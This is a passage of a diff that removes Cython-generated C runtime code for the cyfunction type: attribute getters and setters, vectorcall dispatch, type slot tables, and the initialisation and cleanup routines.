CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - op->defaults_tuple = PyTuple_GET_ITEM(res, 0); - Py_INCREF(op->defaults_tuple); - op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); - Py_INCREF(op->defaults_kwdict); - #else - op->defaults_tuple = __Pyx_PySequence_ITEM(res, 0); - if (unlikely(!op->defaults_tuple)) result = -1; - else { - op->defaults_kwdict = __Pyx_PySequence_ITEM(res, 1); - if (unlikely(!op->defaults_kwdict)) result = -1; - } - #endif - Py_DECREF(res); - return result; -} -static int -__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - if (!value) { - value = Py_None; - } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__defaults__ must be set to a tuple object"); - return -1; - } - PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " - "currently affect the values used in function calls", 1); - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->defaults_tuple; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - if (op->defaults_getter) { - if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; - result = op->defaults_tuple; - } else { - result = Py_None; - } - } - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - if (!value) { - value = Py_None; - } else if (unlikely(value != Py_None && !PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__kwdefaults__ must be set to a dict object"); - return -1; - } - PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " - "currently affect the values used in function calls", 1); - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->defaults_kwdict; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - if (op->defaults_getter) { - if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; - result = op->defaults_kwdict; - } else { - result = Py_None; - } - } - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - if (!value || value == Py_None) { - value = NULL; - } else if (unlikely(!PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "__annotations__ must be set to a dict object"); - return -1; - } - Py_XINCREF(value); - __Pyx_Py_XDECREF_SET(op->func_annotations, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { - PyObject* result = op->func_annotations; - CYTHON_UNUSED_VAR(context); - if (unlikely(!result)) { - result = PyDict_New(); - if (unlikely(!result)) return NULL; - op->func_annotations = result; - } - Py_INCREF(result); - return result; -} -static PyObject * -__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { - int is_coroutine; - CYTHON_UNUSED_VAR(context); - if (op->func_is_coroutine) { - return __Pyx_NewRef(op->func_is_coroutine); - } - is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; -#if PY_VERSION_HEX >= 0x03050000 - if (is_coroutine) { - PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; - fromlist = PyList_New(1); - if (unlikely(!fromlist)) return NULL; - Py_INCREF(marker); -#if CYTHON_ASSUME_SAFE_MACROS - PyList_SET_ITEM(fromlist, 0, marker); -#else - if (unlikely(PyList_SetItem(fromlist, 0, marker) < 0)) { - Py_DECREF(marker); - Py_DECREF(fromlist); - return NULL; - } -#endif - module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); - Py_DECREF(fromlist); - if (unlikely(!module)) goto ignore; - op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); - Py_DECREF(module); - if (likely(op->func_is_coroutine)) { - return __Pyx_NewRef(op->func_is_coroutine); - } -ignore: - PyErr_Clear(); - } -#endif - op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); - return __Pyx_NewRef(op->func_is_coroutine); -} -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject * -__Pyx_CyFunction_get_module(__pyx_CyFunctionObject *op, void *context) { - CYTHON_UNUSED_VAR(context); - return PyObject_GetAttrString(op->func, "__module__"); -} -static int -__Pyx_CyFunction_set_module(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - return PyObject_SetAttrString(op->func, "__module__", value); -} -#endif -static PyGetSetDef __pyx_CyFunction_getsets[] = { - {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, - {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, - {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, - {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, - {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, - {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, - {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, - {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, - {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, - {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, - {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, - {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, - {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, - {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, - {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, - {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, - {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, - {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, -#if CYTHON_COMPILING_IN_LIMITED_API - {"__module__", (getter)__Pyx_CyFunction_get_module, (setter)__Pyx_CyFunction_set_module, 0, 0}, -#endif - {0, 0, 0, 0, 0} -}; -static PyMemberDef __pyx_CyFunction_members[] = { -#if !CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, -#endif -#if CYTHON_USE_TYPE_SPECS - {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, -#if CYTHON_METH_FASTCALL -#if CYTHON_BACKPORT_VECTORCALL - {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, -#else -#if !CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, -#endif -#endif -#endif -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, -#else - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, -#endif -#endif - {0, 0, 0, 0, 0} -}; -static PyObject * -__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) -{ - CYTHON_UNUSED_VAR(args); -#if PY_MAJOR_VERSION >= 3 - Py_INCREF(m->func_qualname); - return m->func_qualname; -#else - return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); -#endif -} -static PyMethodDef __pyx_CyFunction_methods[] = { - {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, - {0, 0, 0, 0} -}; -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API -#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) -#else -#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) -#endif -static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, - PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { -#if !CYTHON_COMPILING_IN_LIMITED_API - PyCFunctionObject *cf = (PyCFunctionObject*) op; -#endif - if (unlikely(op == NULL)) - return NULL; -#if CYTHON_COMPILING_IN_LIMITED_API - op->func = PyCFunction_NewEx(ml, (PyObject*)op, module); - if (unlikely(!op->func)) return NULL; -#endif - op->flags = flags; - __Pyx_CyFunction_weakreflist(op) = NULL; -#if !CYTHON_COMPILING_IN_LIMITED_API - cf->m_ml = ml; - cf->m_self = (PyObject *) op; -#endif - Py_XINCREF(closure); - op->func_closure = closure; -#if !CYTHON_COMPILING_IN_LIMITED_API - Py_XINCREF(module); - cf->m_module = module; -#endif - op->func_dict = NULL; - op->func_name = NULL; - Py_INCREF(qualname); - op->func_qualname = qualname; - op->func_doc = NULL; -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - op->func_classobj = NULL; -#else - ((PyCMethodObject*)op)->mm_class = NULL; -#endif - op->func_globals = globals; - Py_INCREF(op->func_globals); - Py_XINCREF(code); - op->func_code = code; - op->defaults_pyobjects = 0; - op->defaults_size = 0; - op->defaults = NULL; - op->defaults_tuple = NULL; - op->defaults_kwdict = NULL; - op->defaults_getter = NULL; - op->func_annotations = NULL; - op->func_is_coroutine = NULL; -#if CYTHON_METH_FASTCALL - switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { - case METH_NOARGS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; - break; - case METH_O: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; - break; - case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; - break; - case METH_FASTCALL | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; - break; - case METH_VARARGS | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = NULL; - break; - default: - PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); - Py_DECREF(op); - return NULL; - } -#endif - return (PyObject *) op; -} -static int -__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) -{ - Py_CLEAR(m->func_closure); -#if CYTHON_COMPILING_IN_LIMITED_API - Py_CLEAR(m->func); -#else - Py_CLEAR(((PyCFunctionObject*)m)->m_module); -#endif - Py_CLEAR(m->func_dict); - Py_CLEAR(m->func_name); - Py_CLEAR(m->func_qualname); - Py_CLEAR(m->func_doc); - Py_CLEAR(m->func_globals); - Py_CLEAR(m->func_code); -#if !CYTHON_COMPILING_IN_LIMITED_API -#if PY_VERSION_HEX < 0x030900B1 - Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); -#else - { - PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; - ((PyCMethodObject *) (m))->mm_class = NULL; - Py_XDECREF(cls); - } -#endif -#endif - Py_CLEAR(m->defaults_tuple); - Py_CLEAR(m->defaults_kwdict); - Py_CLEAR(m->func_annotations); - Py_CLEAR(m->func_is_coroutine); - if (m->defaults) { - PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); - int i; - for (i = 0; i < m->defaults_pyobjects; i++) - Py_XDECREF(pydefaults[i]); - PyObject_Free(m->defaults); - m->defaults = NULL; - } - return 0; -} -static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) -{ - if (__Pyx_CyFunction_weakreflist(m) != NULL) - PyObject_ClearWeakRefs((PyObject *) m); - __Pyx_CyFunction_clear(m); - __Pyx_PyHeapTypeObject_GC_Del(m); -} -static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) -{ - PyObject_GC_UnTrack(m); - __Pyx__CyFunction_dealloc(m); -} -static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) -{ - Py_VISIT(m->func_closure); -#if CYTHON_COMPILING_IN_LIMITED_API - Py_VISIT(m->func); -#else - Py_VISIT(((PyCFunctionObject*)m)->m_module); -#endif - Py_VISIT(m->func_dict); - Py_VISIT(m->func_name); - Py_VISIT(m->func_qualname); - Py_VISIT(m->func_doc); - Py_VISIT(m->func_globals); - Py_VISIT(m->func_code); -#if !CYTHON_COMPILING_IN_LIMITED_API - Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); -#endif - Py_VISIT(m->defaults_tuple); - Py_VISIT(m->defaults_kwdict); - Py_VISIT(m->func_is_coroutine); - if (m->defaults) { - PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); - int i; - for (i = 0; i < m->defaults_pyobjects; i++) - Py_VISIT(pydefaults[i]); - } - return 0; -} -static PyObject* -__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) -{ -#if PY_MAJOR_VERSION >= 3 - return PyUnicode_FromFormat("", - op->func_qualname, (void *)op); -#else - return PyString_FromFormat("", - PyString_AsString(op->func_qualname), (void *)op); -#endif -} -static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject *f = ((__pyx_CyFunctionObject*)func)->func; - PyObject *py_name = NULL; - PyCFunction meth; - int flags; - meth = PyCFunction_GetFunction(f); - if (unlikely(!meth)) return NULL; - flags = PyCFunction_GetFlags(f); - if (unlikely(flags < 0)) return NULL; -#else - PyCFunctionObject* f = (PyCFunctionObject*)func; - PyCFunction meth = f->m_ml->ml_meth; - int flags = f->m_ml->ml_flags; -#endif - Py_ssize_t size; - switch (flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { - case METH_VARARGS: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) - return (*meth)(self, arg); - break; - case METH_VARARGS | METH_KEYWORDS: - return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); - case METH_NOARGS: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) { -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(arg); -#else - size = PyTuple_Size(arg); - if (unlikely(size < 0)) return NULL; -#endif - if (likely(size == 0)) - return (*meth)(self, NULL); -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, - "%.200S() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - py_name, size); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, - "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - f->m_ml->ml_name, size); -#endif - return NULL; - } - break; - case METH_O: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) { -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(arg); -#else - size = PyTuple_Size(arg); - if (unlikely(size < 0)) return NULL; -#endif - if (likely(size == 1)) { - PyObject *result, *arg0; - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - arg0 = PyTuple_GET_ITEM(arg, 0); - #else - arg0 = __Pyx_PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; - #endif - result = (*meth)(self, arg0); - #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) - Py_DECREF(arg0); - #endif - return result; - } -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, - "%.200S() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - py_name, size); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, - "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - f->m_ml->ml_name, size); -#endif - return NULL; - } - break; - default: - PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); - return NULL; - } -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, "%.200S() takes no keyword arguments", - py_name); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", - f->m_ml->ml_name); -#endif - return NULL; -} -static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { - PyObject *self, *result; -#if CYTHON_COMPILING_IN_LIMITED_API - self = PyCFunction_GetSelf(((__pyx_CyFunctionObject*)func)->func); - if (unlikely(!self) && PyErr_Occurred()) return NULL; -#else - self = ((PyCFunctionObject*)func)->m_self; -#endif - result = __Pyx_CyFunction_CallMethod(func, self, arg, kw); - return result; -} -static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { - PyObject *result; - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; -#if CYTHON_METH_FASTCALL - __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); - if (vc) { -#if CYTHON_ASSUME_SAFE_MACROS - return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); -#else - (void) &__Pyx_PyVectorcall_FastCallDict; - return PyVectorcall_Call(func, args, kw); -#endif - } -#endif - if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { - Py_ssize_t argc; - PyObject *new_args; - PyObject *self; -#if CYTHON_ASSUME_SAFE_MACROS - argc = PyTuple_GET_SIZE(args); -#else - argc = PyTuple_Size(args); - if (unlikely(!argc) < 0) return NULL; -#endif - new_args = PyTuple_GetSlice(args, 1, argc); - if (unlikely(!new_args)) - return NULL; - self = PyTuple_GetItem(args, 0); - if (unlikely(!self)) { - Py_DECREF(new_args); -#if PY_MAJOR_VERSION > 2 - PyErr_Format(PyExc_TypeError, - "unbound method %.200S() needs an argument", - cyfunc->func_qualname); -#else - PyErr_SetString(PyExc_TypeError, - "unbound method needs an argument"); -#endif - return NULL; - } - result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); - Py_DECREF(new_args); - } else { - result = __Pyx_CyFunction_Call(func, args, kw); - } - return result; -} -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) -{ - int ret = 0; - if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { - if (unlikely(nargs < 1)) { - PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", - ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); - return -1; - } - ret = 1; - } - if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { - PyErr_Format(PyExc_TypeError, - "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); - return -1; - } - return ret; -} -static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - if (unlikely(nargs != 0)) { - PyErr_Format(PyExc_TypeError, - "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - def->ml_name, nargs); - return NULL; - } - return def->ml_meth(self, NULL); -} -static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - if (unlikely(nargs != 1)) { - PyErr_Format(PyExc_TypeError, - "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - def->ml_name, nargs); - return NULL; - } - return def->ml_meth(self, args[0]); -} -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); -} -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; - PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); -} -#endif -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_CyFunctionType_slots[] = { - {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, - {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, - {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, - {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, - {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, - {Py_tp_methods, (void *)__pyx_CyFunction_methods}, - {Py_tp_members, (void *)__pyx_CyFunction_members}, - {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, - {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, - {0, 0}, -}; -static PyType_Spec __pyx_CyFunctionType_spec = { - __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", - sizeof(__pyx_CyFunctionObject), - 0, -#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR - Py_TPFLAGS_METHOD_DESCRIPTOR | -#endif -#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) - _Py_TPFLAGS_HAVE_VECTORCALL | -#endif - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, - __pyx_CyFunctionType_slots -}; -#else -static PyTypeObject __pyx_CyFunctionType_type = { - PyVarObject_HEAD_INIT(0, 0) - __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", - sizeof(__pyx_CyFunctionObject), - 0, - (destructor) __Pyx_CyFunction_dealloc, -#if !CYTHON_METH_FASTCALL - 0, -#elif CYTHON_BACKPORT_VECTORCALL - (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), -#else - offsetof(PyCFunctionObject, vectorcall), -#endif - 0, - 0, -#if PY_MAJOR_VERSION < 3 - 0, -#else - 0, -#endif - (reprfunc) __Pyx_CyFunction_repr, - 0, - 0, - 0, - 0, - __Pyx_CyFunction_CallAsMethod, - 0, - 0, - 0, - 0, -#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR - Py_TPFLAGS_METHOD_DESCRIPTOR | -#endif -#if defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL - _Py_TPFLAGS_HAVE_VECTORCALL | -#endif - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, - 0, - (traverseproc) __Pyx_CyFunction_traverse, - (inquiry) __Pyx_CyFunction_clear, - 0, -#if PY_VERSION_HEX < 0x030500A0 - offsetof(__pyx_CyFunctionObject, func_weakreflist), -#else - offsetof(PyCFunctionObject, m_weakreflist), -#endif - 0, - 0, - __pyx_CyFunction_methods, - __pyx_CyFunction_members, - __pyx_CyFunction_getsets, - 0, - 0, - __Pyx_PyMethod_New, - 0, - offsetof(__pyx_CyFunctionObject, func_dict), - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, -#if PY_VERSION_HEX >= 0x030400a1 - 0, -#endif -#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, -#endif -#if __PYX_NEED_TP_PRINT_SLOT - 0, -#endif -#if PY_VERSION_HEX >= 0x030C0000 - 0, -#endif -#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, -#endif -}; -#endif -static int __pyx_CyFunction_init(PyObject *module) { -#if CYTHON_USE_TYPE_SPECS - __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); -#else - CYTHON_UNUSED_VAR(module); - __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); -#endif - if (unlikely(__pyx_CyFunctionType == NULL)) { - return -1; - } - return 0; -} -static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults = PyObject_Malloc(size); - if (unlikely(!m->defaults)) - return PyErr_NoMemory(); - memset(m->defaults, 0, size); - m->defaults_pyobjects = pyobjects; - m->defaults_size = size; - return m->defaults; -} -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults_tuple = tuple; - Py_INCREF(tuple); -} -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults_kwdict = dict; - Py_INCREF(dict); -} -static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->func_annotations = dict; - Py_INCREF(dict); -} - -/* CythonFunction */ -static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, - PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { - PyObject *op = __Pyx_CyFunction_Init( - PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), - ml, flags, qualname, closure, module, globals, code - ); - if (likely(op)) { - PyObject_GC_Track(op); - } - return op; -} - -/* pyfrozenset_new */ -static CYTHON_INLINE PyObject* __Pyx_PyFrozenSet_New(PyObject* it) { - if (it) { 